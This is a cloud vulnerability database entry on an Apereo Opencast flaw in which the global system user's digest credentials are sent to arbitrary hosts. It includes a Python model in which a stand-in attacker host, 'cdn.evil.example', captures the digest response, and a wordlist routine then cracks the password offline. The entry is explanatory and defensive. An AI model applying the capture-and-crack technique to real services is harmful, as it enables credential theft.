
Cloud Vulnerability DB
An open project to list all known cloud vulnerabilities and Cloud Service Provider security issues
An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. When Opencast fetches files listed in a media package and the serving host answers with an HTTP authentication challenge, it responds with the digest credentials of its global system user, regardless of whether the target host is part of the Opencast cluster or an arbitrary external service (GitHub Advisory, NVD).
The vulnerability has been assigned a CVSS v3.1 base score of 7.5 (High) with vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. It is classified as insufficiently protected credentials (CWE-522): the system attempts to authenticate against any external service using the global system user's credentials (GitHub Advisory).
Earlier hardening already stopped Opencast from sending clear-text credentials (for example HTTP Basic authentication) to such hosts, but digest authentication is not a safe substitute. A digest response is an MD5 hash over the password together with the realm, nonce, method and URI, and an attacker who controls the server picks the nonce and sees every other input, so the captured response can be attacked offline until the password is recovered. Given enough effort, this leads to disclosure of the global system user's credentials (GitHub Advisory).
The issue has been fixed in Opencast 10.6, which now sends authentication responses only to servers that are part of the Opencast cluster, so external services never receive any form of authentication attempt. No workaround is available for earlier versions; upgrading is the only remediation (GitHub Advisory).
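The following is an added example, not Opencast's own code (Opencast is written in Java; this is a Python model of the behaviour the advisory describes). It puts the pre-10.6 client beside the 10.6 rule and shows why a digest response handed to an untrusted host is recoverable offline. The hostnames, cluster membership, credentials, nonces and the in-memory SERVERS table standing in for the network are all constructed for the demonstration.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed demo values; they are not Opencast's real configuration or secrets.
CLUSTER_HOSTS = {"admin.opencast.example", "worker1.opencast.example"}
SYSTEM_USER = "opencast_system_account"
SYSTEM_PASS = "CHANGE_ME"


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, password, realm, nonce, method, uri):
    """RFC 2617 MD5 digest without qop: MD5(HA1 ':' nonce ':' HA2)."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_auth_params(header):
    """Turn 'Digest k="v", k2="v2"' into a dict of the quoted parameters."""
    return dict(re.findall(r'(\w+)="([^"]*)"', header))


class RogueServer:
    """Attacker host referenced from a media package: always answers 401 with a
    Digest challenge (nonce chosen by the attacker) and records any Authorization header."""
    realm, nonce = "evil", "deadbeef"

    def __init__(self):
        self.captured = []

    def handle(self, method, path, authorization=None):
        if authorization:
            self.captured.append(authorization)
        return 401, {"WWW-Authenticate": f'Digest realm="{self.realm}", nonce="{self.nonce}"'}


class ClusterServer:
    """A legitimate cluster node that verifies the system user's digest response."""
    realm, nonce = "Opencast", "c0ffee"

    def handle(self, method, path, authorization=None):
        if authorization:
            p = parse_auth_params(authorization)
            expected = digest_response(SYSTEM_USER, SYSTEM_PASS, self.realm, self.nonce, method, path)
            if p.get("response") == expected:
                return 200, {}
        return 401, {"WWW-Authenticate": f'Digest realm="{self.realm}", nonce="{self.nonce}"'}


# In-memory stand-in for the network: hostname -> server object (constructed).
SERVERS = {
    "admin.opencast.example": ClusterServer(),
    "cdn.evil.example": RogueServer(),
}


def fetch_element(url, restrict_to_cluster):
    """Fetch one media-package element with the system user's digest credentials.

    restrict_to_cluster=False models the pre-10.6 behaviour: every 401 Digest challenge
    is answered. restrict_to_cluster=True models the 10.6 rule: challenges from hosts
    outside CLUSTER_HOSTS are never answered. Returns the final HTTP status."""
    parsed = urlparse(url)
    host, path = parsed.hostname, parsed.path
    server = SERVERS[host]
    status, headers = server.handle("GET", path)
    if status != 401 or not headers.get("WWW-Authenticate", "").startswith("Digest "):
        return status
    if restrict_to_cluster and host not in CLUSTER_HOSTS:
        return status  # challenge left unanswered: no credential material leaves the cluster
    p = parse_auth_params(headers["WWW-Authenticate"])
    resp = digest_response(SYSTEM_USER, SYSTEM_PASS, p["realm"], p["nonce"], "GET", path)
    auth = (f'Digest username="{SYSTEM_USER}", realm="{p["realm"]}", '
            f'nonce="{p["nonce"]}", uri="{path}", response="{resp}"')
    status, _ = server.handle("GET", path, auth)
    return status


def crack_captured_digest(authorization, method, wordlist):
    """Offline attack on a captured Digest response: the attacker already knows realm,
    nonce, uri and method, so each candidate password costs three MD5 computations."""
    p = parse_auth_params(authorization)
    for candidate in wordlist:
        if digest_response(p["username"], candidate, p["realm"], p["nonce"], method, p["uri"]) == p["response"]:
            return candidate
    return None


if __name__ == "__main__":
    rogue = SERVERS["cdn.evil.example"]
    print("vulnerable:", fetch_element("http://cdn.evil.example/track.mp4", restrict_to_cluster=False))
    print("captured  :", rogue.captured[-1])
    print("cracked   :", crack_captured_digest(rogue.captured[-1], "GET", ["password", "CHANGE_ME"]))
    print("fixed     :", fetch_element("http://cdn.evil.example/track.mp4", restrict_to_cluster=True),
          "| headers captured so far:", len(rogue.captured))
    print("cluster   :", fetch_element("http://admin.opencast.example/files/track.mp4", restrict_to_cluster=True))
```

The rogue host never needs to serve the file: a single 401 with an attacker-chosen nonce is enough to collect the system user's digest response, and the wordlist loop is the whole "cracking" step. The 10.6 rule works because the decision to answer a challenge is made on the target hostname before any credential-derived value is computed, which is the check to look for when reviewing similar fetch-and-authenticate code.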
Source: This report was generated using AI